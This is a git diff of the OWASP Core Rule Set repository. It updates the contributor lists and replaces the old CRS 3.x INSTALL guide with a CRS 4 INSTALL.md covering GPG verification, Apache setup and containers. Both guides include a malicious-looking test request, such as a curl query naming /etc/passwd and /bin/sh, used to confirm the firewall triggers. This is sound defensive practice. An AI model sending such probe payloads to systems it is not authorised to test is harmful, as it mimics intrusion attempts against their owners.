+- [Paul Beckett](https://github.com/53cur3M3)
 - [Franziska Bühler](https://github.com/franbuehler)
 - [Christoph Hansen](https://github.com/emphazer)
 - [Ervin Hegedus](https://github.com/airween)
-- [Victor Hora](https://github.com/victorhora)
+- [Andrew Howe](https://github.com/RedXanadu)
+- [Karel Knibbe](https://github.com/karelorigin)
+- [Max Leske](https://github.com/theseion)
 - [Andrea Menin](https://github.com/theMiddleBlue)
+- [Matteo Pace](https://github.com/M4tteoP)
+- [Jitendra Patro](https://github.com/Xhoenix)
+- [Chaim Sanders](https://github.com/csanders-git)
 - [Federico G. Schwindt](https://github.com/fgsch)
-- [Manuel Spartan](https://github.com/spartantri)
-- [Felipe Zimmerle](https://github.com/zimmerle)
-- [Felipe Zipitría](https://github.com/fzipi)
+- [Manuel Leos Rivas](https://github.com/spartantri)
+- [Simon Studer](https://github.com/studersi)
+- [Jozef Sudolský](https://github.com/azurit)
 ## Contributors:
 - [agusmu](https://github.com/agusmu)
+- [Amir Hosein Aliakbarian](https://github.com/AmirHoseinAliakbarian)
 - [Zack Allen](https://github.com/zmallen)
 - [azhao155](https://github.com/azhao155)
-- [azurit](https://github.com/azurit)
 - [Matt Bagley](https://github.com/bagley)
 - [Ryan Barnett](https://github.com/rcbarnett)
-- [soufianebenali](https://github.com/soufianebenali)
+- [Soufiane Benali](https://github.com/soufianebenali)
 - [Peter Bittner](https://github.com/bittner)
 - [Allan Boll](https://github.com/allanbomsft)
 - [Jeremy Brown](https://github.com/jwbrown77)
+- [Esad Cetiner](https://github.com/esadcetiner/)
 - [Brent Clark](https://github.com/brentclark)
 - [Jonathan Claudius](https://github.com/claudijd)
 - [coolt](https://github.com/coolt)
+- [Hussein Daher](https://github.com/hussein98d)
+- [Abu Dawud](https://github.com/abudawud)
 - [Ashish Dixit](https://github.com/tundal45)
+- [Mirko Dziadzka](https://github.com/mirkodziadzka-avi)
 - [Padraig Doran](https://github.com/padraigdoran)
 - [Dan Ehrlich](https://github.com/danehrlich1)
+- [İlteriş Eroğlu](https://github.com/linuxgemini)
 - [Umar Farook](https://github.com/umarfarook882)
+- [flo405](https://github.com/flo405)
+- [Fregf](https://github.com/Fregf)
 - [FrozenSolid](https://github.com/frozenSolid)
 - [Pásztor Gábor](https://github.com/gpasztor87)
+- [Jan Gora](https://github.com/terjanq)
 - [Aaron Haaf](https://github.com/Everspace)
 - [Michael Haas](https://github.com/MichaelHaas)
+- [henkworks](https://github.com/henkworks)
+- [Tim Herren](https://github.com/nerrehmit)
+- [Victor Hora](https://github.com/victorhora)
+- [itsTheFae](https://github.com/itsTheFae)
 - [jamuse](https://github.com/jamuse)
 - [jeremyjpj0916](https://github.com/jeremyjpj0916)
 - [jschleus](https://github.com/jschleus)
+- [k4n5ha0](https://github.com/k4n5ha0)
+- [kam821](https://github.com/kam821)
+- [Katherine](https://github.com/katef)
+- [kyzentun](https://github.com/kyzentun)
+- [Joost de Keijzer](https://github.com/joostdekeijzer)
 - [Krzysztof Kotowicz](https://github.com/koto)
-- [Max Leske](https://github.com/theseion)
-- Manuel Leos
 - [Evgeny Marmalstein](https://github.com/shimshon70)
 - [meetug](https://github.com/meetug)
 - [Christian Mehlmauer](https://github.com/FireFart)
+- [Pinaki Mondal](https://github.com/0xinfection)
 - [Glyn Mooney](https://github.com/skidoosh)
 - [na1ex](https://github.com/na1ex)
 - [Jose Nazario](https://github.com/paralax)
-- [Tim Herren](https://github.com/nerrehmit)
 - [Scott O'Neil](https://github.com/cPanelScott)
+- [NiceYouKnow](https://github.com/NiceYouKnow)
+- [nobletrout](https://github.com/nobletrout)
 - [Fernando Outeda](https://github.com/fog94)
 - [NullIsNot0](https://github.com/NullIsNot0)
 - [Robert Paprocki](https://github.com/p0pr0ck5)
@@ -62,15 +85,22 @@
 - [Elia Pinto](https://github.com/yersinia)
 - [pyllyukko](https://github.com/pyllyukko)
 - [Brian Rectanus](https://github.com/b1v1r)
+- [Vandan Rohatgi](https://github.com/vandanrohatgi)
 - [Rufus125](https://github.com/Rufus125)
 - Ofer Shezaf
+- [Takaya Saeki](https://github.com/nullpo-head)
 - Breno Silva
+- [Deepshikha Sinha](https://github.com/deepshikha-s)
 - siric\_
 - Emile-Hugo Spir
+- [somechris](https://github.com/somechris)
 - [Marc Stern](https://github.com/marcstern)
-- [Simon Studer](https://github.com/studersi)
 - [supplient](https://github.com/supplient)
-- [theMiddle](https://github.com/theMiddleBlue)
+- [Mike Taylor](https://github.com/miketaylr)
+- [ThanhPT](https://github.com/nevol1708)
+- [Timo](https://github.com/ntimo)
+- [Juan-Pablo Tosso](https://github.com/jptosso)
+- [vijayasija99](https://github.com/vijayasija99)
 - [Ben Williams](https://github.com/benwilliams)
 - [Anna Winkler](https://github.com/annawinkler)
 - [Avery Wong](https://github.com/4v3r9)
@@ -79,7 +109,35 @@
 - [XeroChen](https://github.com/XeroChen)
 - [ygrek](https://github.com/ygrek)
 - [Yu Yagihashi](https://github.com/yagihash)
+- [Felipe "Zimmerle" Costa](https://github.com/zimmerle)
 - [Zino](https://github.com/zinoe)
 - Josh Zlatin
 - [Zou Guangxian](https://github.com/zouguangxian)
 - [4ft35t](https://github.com/4ft35t)
+- [Andy Clapson](https://github.com/Homesteady)
+- [Anuraag Agrawal](https://github.com/anuraaga)
+- [Christian Aistleitner](https://github.com/somechris)
+- [Dennis Brown](https://github.com/MutableLoss)
+- [Dexter Chang](https://github.com/dextermallo)
+- [Esa Jokinen](https://github.com/oh2fih)
+- [Finn Westendorf](https://github.com/wfinn)
+- [Gwendal Le Coguic](https://github.com/gwen001)
+- [Jean-François Viguier](https://github.com/jf-viguier)
+- [Juan Pablo Tosso](https://github.com/jptosso)
+- [Karel](https://github.com/karelorigin)
+- [Khiem Doan](https://github.com/khiemdoan)
+- [Mark Zeman](https://github.com/KramNamez)
+- [Priyam Patel](https://github.com/priyam001)
+- [Robert DeBoer](https://github.com/robertdeboer)
+- [Somdev Sangwan](https://github.com/s0md3v)
+- [Stephen Sigwart](https://github.com/ssigwart)
+- [Zerorigin](https://github.com/Zerorigin)
+- [Syin Wu](https://github.com/bxlxx)
+- [henkdswiss](https://github.com/henkworks)
+- [ignatiev](https://github.com/ignatiev)
+- [oct0pus7](https://github.com/oct0pus7)
+- [Timo](https://github.com/ntimo)
+- [rekter0](https://github.com/rekter0)
+- [ThanhPT](https://github.com/thanhpt1708)
+- [Vandan Rohatgi](https://github.com/vandanrohatgi)
+- [NiceYouKnow](https://github.com/NiceYouKnow)
diff --git a/INSTALL b/INSTALL
deleted file mode 100644
index cf83cdb77f..0000000000
--- a/INSTALL
+++ /dev/null
@@ -1,305 +0,0 @@ - _____ _____ _____ ____ - / ____| __ \ / ____| |___ \ - | | | |__) | (___ __) | - | | | _ / \___ \ |__ < - | |____| | \ \ ____) | ___) | - \_____|_| \_\_____/ |____/ - - OWASP Core Rule Set 3.x - -Installing ModSecurity -===================== - - This document does NOT detail how to install ModSecurity. Rather, - only information pertaining to the installation of the OWASP Core - Rule Set (CRS) is provided. However, ModSecurity is a prerequisite - for the CRS installation. Information on installing ModSecurity - can be found within the ModSecurity project at - https://github.com/SpiderLabs/ModSecurity or at ModSecurity.org. - -Installing From a Package Manager -================================= - - The OWASP Core Rule Set (CRS) is available from many sources. On - multiple platforms this includes package managers. These packages are - maintained by independent packagers who package CRS in their own time. - Historically, many of these packages have been out of date. As such, - it is recommended that you install, where possible, from our GitHub - repository. The following CRS 3.x packages are known to exist: - - modsecurity-crs - Debian - mod_security_crs - Fedora - modsecurity-crs - Gentoo - - Packages of CRS 2.x are incompatible with CRS 3.x. - -Installing -========== - - You can download a copy of the CRS from the following URL: - https://coreruleset.org/installation/ - - Our release zip/tar.gz files are the preferred way to install CRS. - - However, if you want to follow rule development closely and get - the newest protections quickly, you can also clone our GitHub - repository to get the current work-in-progress for the next release. - -Prerequisites -------------- - - CRS is designed to be used with ModSecurity (although many other - projects also use the provided rules). CRS version 3.x is designed for - ModSecurity 2.8 or above. CRS version 3.x makes use of libinjection - and libXML2. 
Failure to provide these prerequisites may result in - serious false negatives and CRS version 3.x should NOT be run without - these. Note, however, that libinjection is bundled with ModSecurity - since version 2.8. Additionally, if you are downloading from the - GitHub repo you will need to install 'git' on your system. - -Upgrading from CRS 2.x ----------------------- - CRS 3.x is a major release incompatible with CRS 2.x. - The rule IDs have changed. The file id_renumbering/IdNumbering.csv - contains a list with old and new rule IDs. However, a key feature - of the release 3.x is the reduction of false positives in the - default installation and we recommend you start with a fresh - install from scratch. - Key parameter variables have changed their name and new features - have been introduced. Your former modsecurity_crs_10_setup.conf - file is thus no longer usable. - We recommend you to start with a fresh install from scratch. - -Installing on Apache --------------------- - 1. Install ModSecurity for Apache - 2. Ensure that ModSecurity is loading correctly by checking error.log - at start up for lines indicating ModSecurity is installed. An example - might appear as follows: - ```ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/) configured.``` - 3. The most common method of deploying ModSecurity we have seen is - to create a new folder underneath the Apache directory (typically - /usr/local/apache/, /etc/httpd/, or /etc/apache2). Often this folder - is called 'modsecurity.d'. Create this folder and cd into it. - 4. Download our release from https://coreruleset.org/installation/ - and unpack it into a new owasp-modsecurity-crs folder. - 5. Move the crs-setup.conf.example file to crs-setup.conf. - Please take the time to go through this file and customize the settings - for your local environment. Failure to do so may result in false - negatives and false positives. See the section entitled OWASP CRS - Configuration for more detail. - 6. 
Rename rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example and - rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example to remove the - '.example' extension. This will allow you to add exclusions without updates - overwriting them in the future. - 7. Add the following line to your httpd.conf/apache2.conf (the following - assumes you've put CRS into modsecurity.d/owasp-modsecurity-crs). You - can alternatively place these in any config file included by Apache: - ``` - - Include modsecurity.d/owasp-modsecurity-crs/crs-setup.conf - Include modsecurity.d/owasp-modsecurity-crs/rules/*.conf - - ``` - 8. Restart web server and ensure it starts without errors - 9. Make sure your web sites are still running fine. - 10. Proceed to the section "Testing the Installation" below. - -Installing on Nginx -------------------- - 1. Compile ModSecurity into Nginx - 2. Ensure that ModSecurity is loading correctly by checking error.log - at start up for lines indicating ModSecurity is installed. An example - might appear as follows: - ```ModSecurity for nginx (STABLE)/2.9.1 (http://www.modsecurity.org/) configured.``` - 3. The most common method of deploying ModSecurity we have seen is - to create a new folder underneath the Nginx directory (typically - /usr/local/nginx/conf/). Often this folder - is called 'owasp-modsecurity-crs'. Create this folder and cd into it. - 4. Download our release from https://coreruleset.org/installation/ - and unpack it into a new owasp-modsecurity-crs folder. - 5. Move the crs-setup.conf.example file to crs-setup.conf. - Please take this time to go through this - file and customize the settings for your local environment. Failure to - do so may result in false negatives and false positives. See the - section entitled OWASP CRS Configuration for more detail. - 6. Rename rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example and - rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example to remove the - '.example' extension. 
This will allow you to add exceptions without updates - overwriting them in the future. - 7. Nginx requires the configuration of a single ModSecurity - configuration file within the nginx.conf file using the - 'ModSecurityConfig' directive (when using ModSecurity 2.x). - Best practice is to set 'ModSecurityConfig' to a file from - which you will include your other ModSecurity configuration - files. In this example we will use: - ```ModSecurityConfig modsec_includes.conf;``` - 7. Within modsec_includes.conf create your includes to the - CRS folder similar to as follows (The modsecurity.conf file from the - ModSecurity installation is included in this example): - ``` - include modsecurity.conf - include owasp-modsecurity-crs/crs-setup.conf - include owasp-modsecurity-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf - include owasp-modsecurity-crs/rules/REQUEST-901-INITIALIZATION.conf - include owasp-modsecurity-crs/rules/REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf - include owasp-modsecurity-crs/rules/REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf - include owasp-modsecurity-crs/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf - include owasp-modsecurity-crs/rules/REQUEST-903.9004-DOKUWIKI-EXCLUSION-RULES.conf - include owasp-modsecurity-crs/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf - include owasp-modsecurity-crs/rules/REQUEST-903.9006-XENFORO-EXCLUSION-RULES.conf - include owasp-modsecurity-crs/rules/REQUEST-905-COMMON-EXCEPTIONS.conf - include owasp-modsecurity-crs/rules/REQUEST-910-IP-REPUTATION.conf - include owasp-modsecurity-crs/rules/REQUEST-911-METHOD-ENFORCEMENT.conf - include owasp-modsecurity-crs/rules/REQUEST-912-DOS-PROTECTION.conf - include owasp-modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf - include owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf - include owasp-modsecurity-crs/rules/REQUEST-921-PROTOCOL-ATTACK.conf - include owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf - 
include owasp-modsecurity-crs/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf - include owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf - include owasp-modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf - include owasp-modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf - include owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf - include owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf - include owasp-modsecurity-crs/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf - include owasp-modsecurity-crs/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf - include owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf - include owasp-modsecurity-crs/rules/RESPONSE-950-DATA-LEAKAGES.conf - include owasp-modsecurity-crs/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf - include owasp-modsecurity-crs/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf - include owasp-modsecurity-crs/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf - include owasp-modsecurity-crs/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf - include owasp-modsecurity-crs/rules/RESPONSE-959-BLOCKING-EVALUATION.conf - include owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf - include owasp-modsecurity-crs/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf - ``` - 8. Restart web server and ensure it starts without errors - 9. Make sure your web sites are still running fine. - 10. Proceed to the section "Testing the Installation" below. - -Installing on IIS ------------------ - The IIS installer comes with an optional version of CRS built in. - To upgrade or install this after the fact follow the following - steps. - 1. Navigate to "[drive_letters]:\Program Files\ModSecurity IIS\" - 2. Download our release from https://coreruleset.org/installation/ - and unpack it into the current folder. - 3. Move the crs-setup.conf.example file to crs-setup.conf. 
- Please take this time to go through this - file and customize the settings for your local environment. Failure to - do so may result in false negatives and false positives. See the - section entitled OWASP CRS Configuration for more detail. - 4. Rename rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example and - rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example to remove the - '.example' extension. This will allow you to add exceptions without updates - overwriting them in the future. - 5. Navigate back to the 'ModSecurity IIS' folder and modify the - 'modsecurity_iis' to include the following: - ``` - include owasp-modsecurity-crs/crs-setup.conf - include owasp-modsecurity-crs/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf - include owasp-modsecurity-crs/rules/REQUEST-901-INITIALIZATION.conf - include owasp-modsecurity-crs/rules/REQUEST-905-COMMON-EXCEPTIONS.conf - include owasp-modsecurity-crs/rules/REQUEST-910-IP-REPUTATION.conf - include owasp-modsecurity-crs/rules/REQUEST-911-METHOD-ENFORCEMENT.conf - include owasp-modsecurity-crs/rules/REQUEST-912-DOS-PROTECTION.conf - include owasp-modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf - include owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf - include owasp-modsecurity-crs/rules/REQUEST-921-PROTOCOL-ATTACK.conf - include owasp-modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf - include owasp-modsecurity-crs/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf - include owasp-modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf - include owasp-modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf - include owasp-modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf - include owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf - include owasp-modsecurity-crs/rules/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION.conf - include owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf - include 
owasp-modsecurity-crs/rules/RESPONSE-950-DATA-LEAKAGES.conf - include owasp-modsecurity-crs/rules/RESPONSE-951-DATA-LEAKAGES-SQL.conf - include owasp-modsecurity-crs/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf - include owasp-modsecurity-crs/rules/RESPONSE-953-DATA-LEAKAGES-PHP.conf - include owasp-modsecurity-crs/rules/RESPONSE-954-DATA-LEAKAGES-IIS.conf - include owasp-modsecurity-crs/rules/RESPONSE-959-BLOCKING-EVALUATION.conf - include owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf - include owasp-modsecurity-crs/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf - ``` - 6. Restart web server and ensure it starts without errors - 7. Make sure your web sites are still running fine. - 8. Proceed to the section "Testing the Installation" below. - -Testing the Installation -======================== - To test your installation you should be able to use any number - of attacks. A typical request which should trigger CRS would be - ```http://localhost/?param=">``` - Upon sending this request you should see events reported in the - error log (nginx apache) or the event viewer (IIS). - - If have not changed the defaults with regards to anomaly scoring, - blocking and sampling percentage, then this request should have - been blocked and access forbidden. Likewise if you have configured - ModSecurity debug logging and/or audit logging this event should - log to these locations as well. - -OWASP CRS Configuration -======================= - The crs-setup.conf file includes management rules - and directives that can control important CRS functions. - The crs-setup.conf file comes with extensive comments. - This section here brings only the essential parts. - - By default we do not include settings within the crs-setup.conf - that configure ModSecurity itself. Instead those configuration - settings are set during the installation of ModSecurity proper. 
- An example for such such a - configuration file is available via the ModSecurity project - (https://github.com/SpiderLabs/ModSecurity/blob/master/modsecurity.conf-recommended). - Be aware the crs-setup.conf file DOES specify - configuration directives such as SecDefaultAction. The default - is the anomaly scoring mode with the appropriate - SecDefaultAction as defined in the crs-setup.conf. - Alternative configuration modes are supported and explained - in crs-setup.conf. - - The default anomaly/correlation mode establishes an incoming - anomaly score threshold of 5 and an outgoing anomaly score - threshold of 4. The default installation has been tuned to - reduce false positives in a way that will allow most requests - to pass in this default setup. - - However, testing the setup and tuning false positives - before going to production is vital. This is especially true - if you raise the paranoia level with is set to 1 by default. - Higher paranoia levels ranging from 2 to 4 include more - aggressive rules which will raise additional false positives - but also raise the security level of your service. - - If you are unsure about the performance impact of the CRS - or if you are unsure about the number of false positives, then - you may want to use the sampling percentage. This number, - which is set to 100 by default, controls the percentage - of requests which is funneled into the CRS. Fresh installs - on high traffic sites are advised to start with a low, or - very low number of percentages and raise the number - slowly up to 100. Be aware that any number below 100 allows - a random number of requests to bypass the ruleset completely. - - Update the TX policy settings for allowed Request Methods, File - Extensions, maximum numbers of arguments, etc to better reflect - your environment that is being protected. - - Make sure your GeoIP and Project Honeypot settings are specified - if you are using them. - The GeoIP database is no longer included with the CRS. 
Instead - you are advised to download it regularly. - - The use of Project Honeypot requires a - free API key. These require an account but can be obtained at - https://www.projecthoneypot.org/httpbl_configure.php. - - Be sure to check out the other settings present within the - crs-setup.conf file. There are many other options that have to - do with aspects of web application security that are beyond - this document but are well explained in crs-setup.conf. diff --git a/INSTALL.md b/INSTALL.md new file mode 100644 index 0000000000..19eb0ac9f4 --- /dev/null +++ b/INSTALL.md 
@@ -0,0 +1,185 @@
+# Installing CRS
+
+This guide aims to get a CRS installation up and running. This guide assumes that a compatible ModSecurity engine is already present and working. If unsure then refer to the [extended install](https://coreruleset.org/docs/deployment/extended_install/) page for full details.
+
+## Downloading the Rule Set
+
+The first step is to download the CRS itself. The CRS project strongly recommends using a [supported version](https://github.com/coreruleset/coreruleset/security/policy).
+
+Official CRS releases can be found at the following URL: https://github.com/coreruleset/coreruleset/releases.
+
+For *production* environments, it is recommended to use the latest release, which is v4.0.0. For *testing* the bleeding edge CRS version, nightly releases are also provided.
+
+### Verifying Releases
+
+{{% notice note %}}
+Releases are signed using the CRS project's [GPG key](https://coreruleset.org/security.asc) (fingerprint: 3600 6F0E 0BA1 6783 2158 8211 38EE ACA1 AB8A 6E72). Releases can be verified using GPG/PGP compatible tooling.
+
+To retrieve the CRS project's public key from public key servers using `gpg`, execute: `gpg --keyserver pgp.mit.edu --recv 0x38EEACA1AB8A6E72` (this ID should be equal to the last sixteen hex characters in the fingerprint).
+
+It is also possible to use `gpg --fetch-key https://coreruleset.org/security.asc` to retrieve the key directly.
+{{% /notice %}}
+
+The following steps assume that a \*nix operating system is being used. Installation is similar on Windows but likely involves using a zip file from the CRS [releases page](https://github.com/coreruleset/coreruleset/releases).
+
+To download the release file and the corresponding signature:
+
+```bash
+wget https://github.com/coreruleset/coreruleset/archive/refs/tags/v4.0.0.tar.gz
+wget https://github.com/coreruleset/coreruleset/releases/download/v4.0.0/coreruleset-4.0.0.tar.gz.asc
+```
+
+To verify the integrity of the release:
+
+```bash
+gpg --verify coreruleset-4.0.0.tar.gz.asc v4.0.0.tar.gz
+gpg: Signature made Wed Jun 30 10:05:48 2021 -03
+gpg: using RSA key 36006F0E0BA167832158821138EEACA1AB8A6E72
+gpg: Good signature from "OWASP Core Rule Set " [unknown]
+gpg: WARNING: This key is not certified with a trusted signature!
+gpg: There is no indication that the signature belongs to the owner.
+Primary key fingerprint: 3600 6F0E 0BA1 6783 2158 8211 38EE ACA1 AB8A 6E72
+```
+
+If the signature was good then the verification succeeds. If a warning is displayed, like the above, it means the CRS project's public key is *known* but is not *trusted*.
+
+To trust the CRS project's public key:
+
+```bash
+gpg --edit-key 36006F0E0BA167832158821138EEACA1AB8A6E72
+gpg> trust
+Your decision: 5 (ultimate trust)
+Are you sure: Yes
+gpg> quit
+```
+
+The result when verifying a release will then look like so:
+
+```bash
+gpg --verify coreruleset-4.0.0.tar.gz.asc v4.0.0.tar.gz
+gpg: Signature made Wed Jun 30 15:05:48 2021 CEST
+gpg: using RSA key 36006F0E0BA167832158821138EEACA1AB8A6E72
+gpg: Good signature from "OWASP Core Rule Set " [ultimate]
+```
+
+## Installing the Rule Set
+
+### Extracting the Files
+
+Once the rule set has been downloaded and verified, extract the rule set files to a well known location on the server. This will typically be somewhere in the web server directory.
+
+The examples presented below demonstrate using Apache. For information on configuring Nginx or IIS see the [extended install](https://coreruleset.org/docs/deployment/extended_install/) page.
+
+Note that while it's common practice to make a new `modsecurity.d` folder, as outlined below, this isn't strictly necessary. The path scheme outlined is common on RHEL-based operating systems; the Apache path used may need to be adjusted to match the server's installation.
+
+```bash
+mkdir /etc/crs4
+tar -xzvf v4.0.0.tar.gz --strip-components 1 -C /etc/crs4
+```
+
+Now all the CRS files will be located below the `/etc/crs4` directory.
+
+### Setting Up the Main Configuration File
+
+After extracting the rule set files, the next step is to set up the main OWASP CRS configuration file. An example configuration file is provided as part of the release package, located in the main directory: `crs-setup.conf.example`.
+
+{{% notice note %}}
+Other aspects of ModSecurity, particularly engine-specific parameters, are controlled by the ModSecurity "recommended" configuration rules, `modsecurity.conf-recommended`. This file comes packaged with ModSecurity itself.
+{{% /notice %}}
+
+In many scenarios, the default example CRS configuration will be a good enough starting point. It is, however, a good idea to take the time to look through the example configuration file *before* deploying it to make sure it's right for a given environment.
+
+Once any settings have been changed within the example configuration file, as needed, it should be renamed to remove the .example portion, like so:
+
+```bash
+cd /etc/crs4
+mv crs-setup.conf.example crs-setup.conf
+```
+
+### Include-ing the Rule Files
+
+The last step is to tell the web server where the rules are. This is achieved by `include`-ing the rule configuration files in the `httpd.conf` file. Again, this example demonstrates using Apache, but the process is similar on other systems (see the [extended install](https://coreruleset.org/docs/deployment/extended_install/) page for details).
+
+```bash
+echo 'IncludeOptional /etc/crs4/crs-setup.conf' >> /etc/httpd/conf/httpd.conf
+echo 'IncludeOptional /etc/crs4/plugins/*-config.conf' >> /etc/httpd/conf/httpd.conf
+echo 'IncludeOptional /etc/crs4/plugins/*-before.conf' >> /etc/httpd/conf/httpd.conf
+echo 'IncludeOptional /etc/crs4/rules/*.conf' >> /etc/httpd/conf/httpd.conf
+echo 'IncludeOptional /etc/crs4/plugins/*-after.conf' >> /etc/httpd/conf/httpd.conf
+```
+
+Now that everything has been configured, it should be possible to restart and being using the OWASP CRS. The CRS rules typically require a bit of tuning with rule exclusions, depending on the site and web applications in question. For more information on tuning, see [false positives and tuning](https://coreruleset.org/docs/concepts/false_positives_tuning/).
+
+```bash
+systemctl restart httpd.service
+```
+
+## Alternative: Using Containers
+
+Another quick option is to use the official CRS [pre-packaged containers](https://coreruleset.org/docs/development/useful_tools/#official-crs-maintained-docker-images). Docker, Podman, or any compatible container engine can be used. The official CRS images are published in the Docker Hub. The image most often deployed is `owasp/modsecurity-crs`: it already has everything needed to get up and running quickly.
+
+The CRS project pre-packages both Apache and Nginx web servers along with the appropriate corresponding ModSecurity engine. More engines, like [Coraza](https://coraza.io/), will be added at a later date.
+
+To protect a running web server, all that's required is to get the appropriate image and set its configuration variables to make the WAF receives requests and proxies them to your backend server.
+
+Below is an example `docker-compose` file that can be used to pull the container images. All that needs to be changed is the `BACKEND` variable so that the WAF points to the backend server in question:
+
+```docker-compose
+services:
+ modsec2-apache:
+ container_name: modsec2-apache
+ image: owasp/modsecurity-crs:apache
+ environment:
+ SERVERNAME: modsec2-apache
+ BACKEND: http://
+ PORT: "80"
+ MODSEC_RULE_ENGINE: DetectionOnly
+ BLOCKING_PARANOIA: 2
+ TZ: "${TZ}"
+ ERRORLOG: "/var/log/error.log"
+ ACCESSLOG: "/var/log/access.log"
+ MODSEC_AUDIT_LOG_FORMAT: Native
+ MODSEC_AUDIT_LOG_TYPE: Serial
+ MODSEC_AUDIT_LOG: "/var/log/modsec_audit.log"
+ MODSEC_TMP_DIR: "/tmp"
+ MODSEC_RESP_BODY_ACCESS: "On"
+ MODSEC_RESP_BODY_MIMETYPE: "text/plain text/html text/xml application/json"
+ COMBINED_FILE_SIZES: "65535"
+ volumes:
+ ports:
+ - "80:80"
+```
+
+That's all that needs to be done. Simply starting the container described above will instantly provide the protection of the latest stable CRS release in front of a given backend server or service. There are [lots of additional variables](https://github.com/coreruleset/modsecurity-crs-docker) that can be used to configure the container image and its behavior, so be sure to read the full documentation.
+
+## Verifying that the CRS is active
+
+Always verify that CRS is installed correctly by sending a 'malicious' request to your site or application, for instance:
+
+```bash
+curl 'https://www.example.com/?foo=/etc/passwd&bar=/bin/sh'
+```
+
+Depending on your configurated thresholds, this should be detected as a malicious request. If you use blocking mode, you should receive an Error 403. The request should also be logged to the audit log, which is usually in `/var/log/modsec_audit.log`.
+
+## Upgrading
+
+### Upgrading from CRS 3.x to CRS 4
+
+The most impactful change is the removal of application exclusion packages in favor of a plugin system. If you had activated the exclusion packages in CRS 3, you should download the plugins for them and place them in the plugins subdirectory. We maintain the list of plugins in our [Plugin Registry](https://github.com/coreruleset/plugin-registry). You can find detailed information on working with plugins in our [plugins documentation]()https://coreruleset.org/docs/concepts/plugins/.
+
+In terms of changes to the detection rules, the amount of changes is smaller than in the CRS 2—3 changeover. Most rules have only evolved slightly, so it is recommended that you keep any existing custom exclusions that you have made under CRS 3.
+
+We recommend to start over by copying our `crs-setup.conf.example` to `crs-setup.conf` with a copy of your old file at hand, and re-do the customizations that you had under CRS 3.
+
+Please note that we added a large number of new detections, and any new detection brings a certain risk of false alarms. Therefore, we recommend to test first before going live.
+
+### Upgrading from CRS 2.x to CRS 3
+
+In general, you can update by unzipping our new release over your older one, and updating the `crs-setup.conf` file with any new settings. However, CRS 3.0 is a major rewrite, incompatible with CRS 2.x. Key setup variables have changed their name, and new features have been introduced. Your former modsecurity_crs_10_setup.conf file is thus no longer usable. We recommend you to start with a fresh crs-setup.conf file from scratch.
+
+Most rule IDs have been changed to reorganize them into logical sections. This means that if you have written custom configuration with exclusion rules (e.g. `SecRuleRemoveById`, `SecRuleRemoveTargetById`, `ctl:ruleRemoveById` or `ctl:ruleRemoveTargetById`) you must renumber the rule numbers in that configuration. You can do this using the supplied utility util/id_renumbering/update.py or find the changes in util/id_renumbering/IdNumbering.csv.
+
+However, a key feature of the CRS 3 is the reduction of false positives in the default installation, and many of your old exclusion rules may no longer be necessary.
